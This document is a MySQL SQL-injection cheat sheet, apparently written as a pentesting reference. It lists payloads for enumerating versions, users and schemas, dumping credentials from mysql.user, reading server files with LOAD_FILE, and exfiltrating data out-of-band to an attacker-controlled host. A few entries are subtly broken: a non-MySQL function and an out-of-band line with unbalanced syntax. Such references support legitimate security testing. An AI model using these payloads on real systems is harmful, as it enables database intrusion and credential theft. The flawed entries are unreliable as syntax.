MySQL Injection Cheat Sheet

Author: HollyGraceful    Published: 05 August 2021    Last Updated: 03 July 2023

# Comments
# 
/* Comment */
-- -
;%00


# Version
SELECT VERSION();
SELECT @@VERSION;
SELECT @@GLOBAL.VERSION;


# User details
user()
current_user()
system_user()
session_user()
SELECT user,password FROM mysql.user;


# Database details
SELECT db_name();
SELECT database();
SELECT schema_name FROM information_schema.schemata;


# Database credentials
SELECT host, user, password FROM mysql.user;


# Server details
SELECT @@hostname;


# Table Name
SELECT table_name FROM information_schema.tables;


# Columns Names
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';


# No Quotes
CONCAT(CHAR(97), CHAR(98), CHAR(99))


# String Concatenation
CONCAT(foo, bar)

 
# Conditionals
SELECT IF(1=1,'true','false');

 
# Time-delay
Sleep(10)


#Command Execution
http://dev.mysql.com/doc/refman/5.1/en/adding-udf.html


# "RunAs"
N/A


# Read Files
SELECT LOAD_FILE('C:\Windows\win.ini');


# Out-of-Band Retrieval
SELECT LOAD_FILE(concat('\\',(SELECT 1), 'attacker.controlledserver.com\')));


# Substrings
SELECT substr(‘Foobar’, 1, 1);


# Retrieve Nth Line
SELECT * FROM table ORDER BY ID LIMIT 3,1